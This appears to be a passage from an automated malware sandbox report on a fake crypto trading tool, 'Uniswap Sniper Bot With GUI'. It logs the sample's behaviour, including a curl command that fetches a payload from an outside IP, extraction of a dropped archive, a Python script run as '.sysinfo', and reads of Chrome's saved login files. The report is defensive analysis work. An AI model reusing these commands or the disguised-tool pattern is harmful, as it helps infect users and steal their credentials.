isAMD(IsApple() && functions->standard == STANDARD_GL_DESKTOP) \|\| (IsLinux() && isAMD)IsApple() && functions->standard == STANDARD_GL_DESKTOP && GetMacOSVersion() < OSVersion(10, 11, 0)IsApple() && isIntel && GetMacOSVersion() < OSVersion(10, 12, 0)IsApple() && isAMDIsAndroid() && isQualcommfunctions->standard == STANDARD_GL_DESKTOP && isNvidiaIsApple() \|\| isNvidiafunctions->isAtMostGL(gl::Version(4, 1)) \|\| (functions->standard == STANDARD_GL_DESKTOP && isAMD)isAMD \|\| IsAndroid()IsAndroid() \|\| isNvidia(IsAndroid() && isQualcomm) \|\| (isIntel && IsApple())isAMD \|\| isIntelIsNexus5X(vendor, device)IsAndroid() \|\| (IsWindows() && isIntel)(IsWindows() && (isIntel \|\| isAMD)) \|\| (IsLinux() && isNvidia) \|\| IsIOS() \|\| IsAndroid() \|\| IsAndroidEmulator(functions)IsAndroid() \|\| limitMaxTextureSizeIsAndroid() \|\| (IsApple() && (isIntel \|\| isAMD \|\| isNvidia))limitMaxTextureSizeIsApple()IsAndroid() \|\| isAMD \|\| !functions->hasExtension("GL_KHR_robust_buffer_access_behavior")IsApple() && isIntel && GetMacOSVersion() >= OSVersion(10, 12, 4)IsApple() && isIntel && GetMacOSVersion() < OSVersion(10, 12, 6)IsLinux() \|\| (IsAndroid() && isNvidia) \|\| (IsWindows() && isNvidia) \|\| (IsApple() && functions->standard == STANDARD_GL_ES)IsApple() \|\| (IsLinux() && isAMD)functions->standard == STANDARD_GL_DESKTOP && functions->isAtLeastGL(gl::Version(3, 1)) && !functions->isAtLeastGL(gl::Version(4, 3))features->emulatePrimitiveRestartFixedIndex.enabled && IsApple() && isIntelIsApple() \|\| IsAndroid() \|\| IsWindows()!isIntel && functions->standard == STANDARD_GL_ES && functions->isAtLeastGLES(gl::Version(3, 1)) && functions->hasGLESExtension("GL_EXT_texture_norm16")IsWindows() && isAMDIsLinux() && isAMD && isMesa && mesaVersion < (std::array<int, 3>{19, 3, 5})(IsLinux() && isVMWare) \|\| (IsAndroid() && isNvidia) \|\| (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliT8xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliG31OrOlder(functions))IsApple() && functions->standard == STANDARD_GL_ES && !(isAMD
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7338000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware Fusion 4 has corrupt rendering with Win Vista+
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMnet
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7338000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware, Inc.
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2356191177.0000000004F2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tga"
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: Access-Control-Allow-Credentials: trueNet.RedirectChainLengthurl_chainload_state_paramdelegate_blocked_byhas_uploadis_pendingDelegateNet.URLRequest.ReferrerPolicyForRequest.SameOriginNet.URLRequest.ReferrerHasInformativePath.SameOriginNet.URLRequest.ReferrerPolicyForRequest.CrossOriginNet.URLRequest.ReferrerHasInformativePath.CrossOrigin../../net/url_request/url_request_job.ccOnDonenum_failuresrelease_after_msThrottling.RequestThrottled../../net/base/network_interfaces_win.ccWlanApiwlanapi.dllWlanQueryInterfaceWlanSetInterfaceVMnetGetAdaptersAddresses failed: x
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7338000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware Inc.
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: eb1a:2860eb1a:28201ce6:282012ab:03801943:22530c45:64d00c45:64d21bcf:298504ca:704704ca:704804f2:b3ed04f2:b3ca05c8:035d05c8:036904ca:709513d3:52570bda:57f20fd9:0066VMware Virtual WebcamMedia.VideoCapture.BlacklistedDeviceGoogle Camera AdapterIP Camera [JPEG/MJPEG]CyberLink Webcam SplitterEpocCam../../media/capture/video/video_capture_metrics.ccDevice supports Media.VideoCapture.Device.SupportedPixelFormatMedia.VideoCapture.Device.SupportedResolution
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (IsLinux() && isVMWare) \|\| (IsAndroid() && isNvidia) \|\| (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliT8xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliG31OrOlder(functions))
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7338000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: Gearway Electronics (Dong Guan) Co., Ltd.VMware Inc.Olimex Ltd.
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7338000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: Qemu Audio Device
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2356191177.0000000004F2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Screen Codec / VMware Video
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7338000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware can crash with older drivers and WebGL content

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv \| "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown""	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2056 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=6544672486 --mojo-platform-channel-handle=2288 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\.pyp\python.exe "C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2056 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --app-path="c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=6544672486 --mojo-platform-channel-handle=2288 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2236 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filepath = \"c:\users\user\appdata\local\temp\tmpn1hib8nx.exe\" invoke-webrequest -uri $url -outfile $filepath "
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2056 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --app-path="c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=6544672486 --mojo-platform-channel-handle=2288 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2236 --field-trial-handle=1904,i,5920993396095536571,17546293119650740774,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filepath = \"c:\users\user\appdata\local\temp\tmpn1hib8nx.exe\" invoke-webrequest -uri $url -outfile $filepath "

Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7338000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: ../../electron/shell/browser/ui/views/electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: ?@../../third_party/webrtc/modules/desktop_capture/win/cursor.ccCreateMouseCursorFromHCursorUnable to get cursor icon info. Error = Unable to get bitmap info. Error = Unable to get bitmap bits. Error = DwmIsCompositionEnabledDwmGetWindowAttribute../../third_party/webrtc/modules/desktop_capture/win/window_capture_utils.ccFail to create instance of VirtualDesktopManagerChrome_WidgetWin_Progman

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\bufferutil\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\bufferutil\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\bufferutil\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\utf-8-validate\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\utf-8-validate\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\utf-8-validate\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\bindings.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\lib\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\bindings.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\lib\api\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\lib\api\shake.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\p2.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\p2.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\p2.zip VolumeInformation	Jump to behavior
